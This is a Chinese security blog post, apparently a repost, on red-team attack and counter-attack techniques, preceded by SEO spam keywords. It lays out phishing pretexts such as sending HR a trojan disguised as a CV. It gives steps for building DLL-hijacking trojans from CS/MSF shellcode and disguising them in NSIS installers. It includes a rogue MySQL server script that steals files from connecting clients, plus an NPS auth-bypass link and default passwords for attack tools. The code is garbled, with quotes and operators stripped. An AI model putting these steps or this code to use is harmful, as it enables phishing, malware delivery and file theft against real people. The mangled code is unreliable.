用asp做的一个网站实例源代码,flash 企业网站 源码,深圳网站优化推广,程序员用的编程软件近年来#xff0c;网络安全领域正在经历一场不断升级的攻防对抗#xff0c;这场攻防已经不再局限于传统的攻击与防御模式#xff0c;攻击者和防守者都已经越发熟练#xff0c;对于传统攻防手法了如指掌。
在这个背景下#xff0c;攻击者必须不断寻求创新的途径#xff0…近年来网络安全领域正在经历一场不断升级的攻防对抗这场攻防已经不再局限于传统的攻击与防御模式攻击者和防守者都已经越发熟练对于传统攻防手法了如指掌。
在这个背景下攻击者必须不断寻求创新的途径以突破外部网络目标的坚固防护体系利用零日漏洞、社会工程学手法、供应链攻击、投毒攻击或者更加隐秘的攻击向量以规避传统的检测与响应机制。防守方也不再仅仅依赖于传统的防御策略如IP封锁或简单的入侵检测已经转向主动防御甚至主动进攻采取主动情报收集、分析与分享实时威胁情报监测、云安全服务、容器化防护等安全防护以应对不断进化的威胁。更加激进的防守方会选择积极主动的策略对攻击者发起反制攻击拿下权限获取情报更多的是被逼的谁不想躺两周呢。
本文将探讨这些非常规的攻击与防御手段。
钓鱼
在网络攻防中社会工程学攻击如钓鱼是一种常见的攻击手段。攻击者利用人们的心理和行为特点通过欺骗、伪装等手段获取敏感信息或实施其他恶意活动。
钓鱼攻击
目前钓鱼的形式多种多样有常规钓鱼手段通过邮箱、微信等IM工具钓鱼也有供应链官方升级文件投毒代码投毒。
求职招聘
攻击者伪装求职平台的求职者联系HR私加微信。经常聊天降低风险意识并套话使用的什么终端设别发送伪装成求职简历的木马文件名HR运行上线。
或者伪装HR联系求职者 投毒
在github公众号等地方投毒 供应链投毒 社会工程学
通过在社交平台寻找疑似工作人员重点关注微博抖音快手小红书然后通过OSINT定制化钓鱼攻击博取对方信任然后投放木马 仿冒IT运维人员
以密码过期、系统升级等理由要求打开链接输入账号密码或者下载恶意附件 补贴 吃瓜
通过捏造吃瓜事件吸引受害者点击恶意文件在攻防时慎用此方式钓鱼可能会被警告21年某象 反钓鱼攻击
可以在经过网络隔离的环境中模拟被钓鱼人员运行攻击者的木马程序同时准备一些模拟的敏感文件例如VPN账号和密码、运维手册等等。这样当攻击者尝试下载和运行这个木马程序时可以对其进行反制。
DLL劫持制作木马
合法程序在运行的时候需要加载合法的dll使用恶意的dll通过函数调用劫持合法dll达到运行合法程序加载恶意dll的效果
使用拿破轮胎大佬的工具工具下载网盘链接https://pan.baidu.com/s/1w8T5vgfGnIBU2Gkpq1kogQ
提取码c29j可以直接自动化劫持dll。
使用CS或者MSF的shellcode生成dll文件这时文件目录会自动生成conf.inf文件和wwwcomw.dll文件,然后选择生成的wwwcomw.dll文件和要劫持的exe文件即可生成被劫持的恶意程序。 将conf.inf文件和wwwcomw.dll文件放入到和劫持的文件同一目录点击运行即可执行shellcode NSIS制作安装包
使用nsis可以将上述多个文件打包成一个安装包并可伪装成任意软件。软件下载地址https://www.pc6.com/softview/SoftView_14342.html 软件使用教程https://www.cnblogs.com/modou/p/3573772.html mysql蜜罐
21年国家HW时某知名社区官方账号就曾使用该方法进行钓鱼在一篇分析投毒代码中留下Mysql蜜罐的账号密码吸引好事者登录mysql蜜罐窃取敏感信息。 LOAD DATA LOCAL INFILE
LOAD DATA LOCAL INFILE 是 MySQL 中用于将数据从本地文件加载到数据库表中的命令。这个命令允许用户通过指定本地文件的路径将数据导入到数据库表中。
读取服务端上的文件内容存入表中
load data infile 文件 into table 表名 fields terminated by 分隔符;读取客户端上的文件内容存入表中
load data local infile 文件 into table 表名 fields terminated by 分隔符;查看LOAD DATA LOCAL INFILE 功能开关状态
show global variables like local_infile;将LOAD DATA LOCAL INFILE 功能打开
set global local_infile1;蜜罐
利用代码伪造连接信息 尝试读取文件信息 if SET NAMES utf8 in res4:conn.sendall(\x07\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00)res5 conn.recv(9999)if SET character_set_resultsNULL in res5:conn.sendall(\x07\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00)conn.close()else:conn.close()else:conn.close()else:conn.close()else:try:wantfile chr(len(filename) 1) \x00\x00\x01\xFB filenameconn.sendall(wantfile)content conn.recv(99999999)# print(len(content))conn.close()if len(content) 4:if PFRO in filename:with open(logpath /PFRO.log, w) as f:f.write(content)f.close()return Trueelse:with open(logpath / filename.replace(/, _).replace(:, ), w) as f:f.write(content)f.close()return Trueelse:return Falseexcept Exception as e:print (e)except Exception as e:print (e)def run():port 3306sv socket.socket()sv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)sv.bind((,port))sv.listen(100)while True:conn, address sv.accept()logpath os.path.abspath(.) /log/ address[0] /PFRO.logif os.path.exists(logpath):with open(logpath, r)as f:content f.read()f.close()content content.replace(\n,).replace(\r,).replace( ,).replace(\t,).replace(\00,)try:res re.findall(rUsers\\(.*)\\, content)[0]username res.split(\\)[0]line C:/Users/ username /Documents/WeChat Files/All Users/config/config.data if not os.path.exists(os.path.abspath(.) /log/ address[0]/line.replace(/, _).replace(:, )):res mysql_get_file_content(line,conn,address)if res:print (Read Success! --- line)else:print (Not Found~ --- line)else:conn.close()except Exception as e:print(e)else:line C:/Windows/PFRO.logres mysql_get_file_content(line,conn,address)if res:print (Read Success! --- line)else:print (Not Found~ --- line)项目地址https://github.com/fnmsd/MySQL_Fake_Server
溯源反制
溯源
钓鱼邮件溯源
从邮件头入手通常会包括Received字段其中包含有关邮件传输的信息如发件服务器的IP地址对IP地址进行反查溯源。 对邮箱账号进行溯源如“qq.com”、“gmail.com”等此类字符串搜索账号等如果使用的是私有域名邮箱可以从这方面入手有次就碰见EwoMail邮箱管理后台一般为8010端口使用了默认口令admin/ewomail123。 邮件中可能包含域名链接或者后门木马也可进行溯源。
后门木马溯源
后门木马类型可能包括LNK、EXE、DOCX等。DOCX文件可能包含“最后编辑者名称”EXE文件中可能包含PDB信息尤其是在开发人员将项目存放在桌面时这可能会导致编译信息与开发人员的终端名称相关联LNK文件在创建时可能会捕获计算机名称。对回连 C2IP溯源。
NPS
未授权访问
当使用默认配置未配置auth_key参数时可以利用时间戳直接伪造管理员token的漏洞。脚本利用https://github.com/0xf4n9x/NPS-AUTH-BYPASS
默认密码
nps的默认账号密码为admin/123 灯塔
默认密码
灯塔的默认账号密码为admin/arlpass
反溯源
NPS
故意留下未授权访问漏洞或者易被猜解漏洞如HW2023客户端内留下网络隔离环境的代理同反钓鱼攻击。
灯塔
在一次攻防时对攻击IP进行测绘发现灯塔资产使用未授权访问直接进入后台发现大量shell。 还好当时留了个心眼儿用沙箱跑了一下发现全是木马也是学到了一波。 原文地址https://forum.butian.net/share/2454 没看够欢迎关注